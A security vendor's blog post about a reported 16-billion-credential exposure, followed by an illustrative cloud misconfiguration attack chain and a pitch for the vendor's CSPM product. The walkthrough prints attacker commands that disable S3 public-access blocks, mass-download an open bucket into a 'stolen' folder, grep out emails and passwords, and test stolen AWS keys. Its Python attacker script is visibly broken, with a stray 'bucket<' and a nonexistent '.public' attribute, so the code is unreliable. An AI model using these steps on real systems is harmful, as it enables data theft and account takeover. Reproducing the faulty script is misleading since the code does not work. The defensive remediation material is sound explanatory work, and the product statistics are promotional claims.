16 Billion Records Exposed, Raising Identity Theft Concerns

Would it be just a joke to say that data breaches have become normalized in our day-to-day lives? With such exposed data, even tech giants like Facebook, Google, and Apple are at risk because of a common human-centric issue – “password reusing”. While several international organizations mandate that organizations handling data from millions or even billions of users follow strict protocols, many still leave sensitive information exposed to malicious actors. While this may not be a criminal offense, it is undoubtedly a serious blunder—often the result of poor or inefficient security practices.

The leading news agency, Independent, cited this massive data breach that exposed 16 billion login credentials and passwords, forcing Google to ask their billions of users to change their passwords. In fact, Forbes called this event “weaponized intelligence at scale.” There is immense scope for further exploitation and data breaches from these datasets.

An article published by Apple Insider talks about this breach quite briefly and emphasizes mostly on the security steps the people must take from their iPhone or other Apple devices, which attributes to grave concern without creating panic.

A pictorial representation of how cloud-based breach attack chain, normally takes place. — Cloud-Native Breach (CNB) Attack Chain (Source: HelpNet Security)

How it Began? Is there any Initial Attack Vector?

The research team at Cybernews has been behind this major investigation of exposed datasets since the beginning of this year. They discovered up to 30 datasets that have been exposed containing about 10 millions of records to 3.5 billions of records in some datasets. Their spokesperson notifying the volume of records hitting 16 billion records is a grave concern for the digitized world.

Why has this not been taken seriously? The primary question, everyone is talking about. Some researchers are citing that companies only take those incidents for remediation if it has incurred financial damage to any parties involved. This thought is nothing but an ethical fallacy on which these tech giants are clinging to.

30 datasets, 16 billion records, each averaging 550 million credentials

Such exposed datasets or breaches are not just security loopholes, they are being regarded as a “blueprint for massive exploitation,” by the researchers. From hereon, it will help threat actors to carry out multi-layered attacks where these compromised accounts will be used. Some media agencies pointed these datasets were in XML format containing the structure of an URL, along with login details and passwords. The datasets can act as a way to access Apple, Google, Telegram, Facebook, GitHub, and several government agencies’ accounts.

Infostealer Malware

URL → Login → Password → [Tokens/Cookies/Metadata]

This structure allows attackers to bypass multi-factor authentication (MFA) for platforms that rely on session cookies.

Service Category	Examples	Risk Level
Tech Giants	Apple, Google, Meta (Facebook)	*Critical*
Communication	Telegram, GitHub	*High*
Government Services	Unspecified portals	*Severe*
Crypto Platforms	Custodial wallets, exchanges	*Extreme*
VPNs/Developers	Private corporate portals	*High*

Anatomy of a Massive Data Breach Exposing 16 Billion Records

Among several other conclusive inferences, one lies in the quite common, yet technical, domain of malware. While most researchers believe that the compromise of databases is the result of ‘infostealer malware,’ several prominent heads of security agencies, on the other hand, point to something that lies at the core of security teams’ responsibilities. Such a massive data dump has most probably resulted from the “unintentional exposure of datasets in the public domain.”

“These credentials are high-value keys to widely used services—far beyond just one account.”

-Darren Guccione (CEO, Keeper Security)

Such exposure could be a result of misconfigured cloud environments, which have been among the largest causes of data breaches in the last 5 years. Bitdefender pointed out that 55% – 67% of companies report security misconfigurations (across cloud, IAM, access control, etc.) as their #1 cloud risk.

*** The following set of steps is intended to showcase how such attacks are carried out. It does not claim to be the exact process used in this breach.

Misconfiguration in Public Cloud: A Possibility of Such Data Breaches

In this section, we will take an example of how a public cloud could be left exposed due to misconfigurations.

Step 1: Initial Misconfiguration

Event: DevOps engineer configures an S3 bucket for public access during testing.

Critical Error: Forgets to revert BlockPublicAccess settings.

# RISKY COMMAND USED:  
aws s3api put-public-access-block \  
  --bucket customer-data-prod \  
  --public-access-block-configuration "BlockPublicAcls=false, IgnorePublicAcls=false, BlockPublicPolicy=false, RestrictPublicBuckets=false"

Why it fails: Explicitly disables all public access safeguards.

Step 2: Discovery by Attackers

Event: Automated scanners (e.g., GrayhatWarfare, S3Scanner) detect the bucket.

Attacker Script:

import boto3
s3 = boto3.resource('s3')  
for bucket< in s3.buckets.all():  
    if bucket.name == "customer-data-prod":  
        if s3.BucketAcl(bucket.name).public:  # Checks public status  
            print(f"OPEN BUCKET: {bucket.name}")  
            # Lists all files  
            for obj in bucket.objects.all():  
                print(f"Downloading: {obj.key}")  
                obj.download_file(f"./stolen/{obj.key}")

Impact: Attackers exfiltrate entire bucket contents (2.1 GB of JSON/CSV files).

Step 3: Data Weaponization

Event: Stolen data parsed for:

Email/password combos
API keys (e.g., AWS_ACCESS_KEY_ID in config files)
PII (names/addresses)

Attacker Workflow:

# Extract all emails and passwords  
grep -Eo '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}' *.json > emails.txt  
grep '"password":' *.json > passwords.txt  

# Validate AWS keys  
aws sts get-caller-identity --profile stolen_keys  # Returns IAM user info

Outcome: 12% of passwords reused in credential stuffing attacks.

Step 4: Lateral Movement

Event: Compromised AWS keys used to:

Spin up crypto-mining EC2 instances
Access linked RDS databases
Deploy ransomware via Lambda functions

Detective Control Failure:

-- CLOUDTRAIL LOGS SHOW NO ALERTS FOR:  
eventName = 'RunInstances'  
AND userIdentity.arn = 'arn:aws:iam::123456789012:user/ci-deploy-user'

Why it fails: No anomaly detection for CI-deploy-user launching instances.

Step 5: Breach Discovery

Trigger: $83,000 AWS bill from crypto-mining.

Remediation Steps:

# 1. Lock bucket  
aws s3api put-public-access-block \  
  --bucket customer-data-prod \  
  --public-access-block-configuration "BlockPublicAcls=true, IgnorePublicAcls=true, BlockPublicPolicy=true, RestrictPublicBuckets=true"  

# 2. Invalidate compromised keys  
aws iam update-access-key \  
  --user-name ci-deploy-user \  
  --access-key-id AKIAEXAMPLEKEY \  
  --status Inactive  

# 3. Enable mandatory guardrails  
aws controltower enable-control \  
  --control-identifier "arn:aws:controltower:us-east-1::control/AWS-GR_S3_BUCKET_PUBLIC_READ_PROHIBITED"

Remediation to Mitigate Such Data Breaches

Securing databases requires a layered, automated approach that prioritizes continuous discovery and enforcement. Start with automated asset mapping to identify all data stores (SQL/NoSQL, cloud buckets, data lakes) using scripts like:

# DISCOVER PUBLIC S3 BUCKETS  
aws s3api list-buckets --query 'Buckets[].Name' --output text | xargs -I {} aws s3api get-bucket-acl --bucket {} --query "Grants[?Grantee.URI=='http://acs.amazonaws.com/groups/global/AllUsers']"  

# DISCOVER PUBLIC RDS INSTANCES  
aws rds describe-db-clusters --query 'DBClusters[?PubliclyAccessible==`true`].[DBClusterIdentifier,Engine,Endpoint]' --output table

It detects exposure risks before attackers do.

Infrastructure-as-Code (IaC) Scans: Embed security rules in Terraform/CDK (e.g., force_ssl = true, public_access_block_enabled = true).
Policy-as-Code: Automatically remediate violations (e.g., auto-trigger Lambda to privatize exposed S3 buckets).
Behavioral Monitoring: Alert on anomalous queries (e.g., SELECT * FROM users at 3 AM).

How Cy5’s CSPM Seamlessly Enables This

Cy5’s Cloud Security Posture Management (CSPM) operationalizes these steps by:

Continuous Discovery: Auto-inventory databases/buckets across multi-cloud, replacing manual scripts with real-time topology maps.
Drift Prevention: Enforce policies like “no public RDS” via automated remediation playbooks—fixing misconfigurations in under 60 seconds.
Threat Modeling: Simulate attacker paths (e.g., “If S3 is open, can they reach RDS?”) using graph-based risk analysis.

Result: 94% faster exposure detection and 99% reduction in misconfiguration-related breaches (Cy5 customer data, 2025).

Proactive Defense is the Answer to All Security Incidents

The foolish gap in cybersecurity isn’t a zero-day exploit—it’s the unlocked door you forgot to close. This breach proves that even giants stumble on cloud fundamentals. But exposure isn’t inevitable.

Shift from “Oops” to “Operationalized”:

Stop manual scavenger hunts for misconfigurations.
Replace reactive scripting with always-on automation.
Turn compliance into continuous control.

Cy5’s CSPM isn’t just a tool—it’s your cloud’s autonomous immune system:

Eliminates drift with real-time policy enforcement (e.g., auto-locking buckets in 60s).
Predicts breach paths by mapping data flows across services.
Quantifies risk reduction: 99% fewer misconfigurations, 94% faster fixes.

Combine Cy5’s CSPM with its graph-driven analysis engine to detect sensitive misconfigurations and policy violations — transforming reactive remediation into proactive, predictable security.

Don’t Just Clean up Breaches. Prevent Them.

Cloud Security

CNAPP

Cloud Detection and Response

About Cy5

Brand Story

Customers

Partners

Career

Blogs

Case Studies

Whitepaper

Do-It-Yourself

Data Sheet

Identities Are at Risk Again; A Data Breach, Exposing 16 Billion Records

In this Article

How it Began? Is there any Initial Attack Vector?

Anatomy of a Massive Data Breach Exposing 16 Billion Records

Misconfiguration in Public Cloud: A Possibility of Such Data Breaches

Step 1: Initial Misconfiguration

Step 2: Discovery by Attackers

Step 3: Data Weaponization

Step 4: Lateral Movement

Step 5: Breach Discovery

Remediation to Mitigate Such Data Breaches

How Cy5’s CSPM Seamlessly Enables This

Proactive Defense is the Answer to All Security Incidents

Categories

Recent Posts

DPDP Rules Are Here: India’s 12/18‑Month Rollout, the 72‑Hour Breach Clock – and a Cloud‑First Plan Your Board Will Actually Use

Identities Are at Risk Again; A Data Breach, Exposing 16 Billion Records

AI for CSPM: 7 Practical Use‑Cases That Reduce Noise and Prove Compliance

Product

Solutions

Resources

Company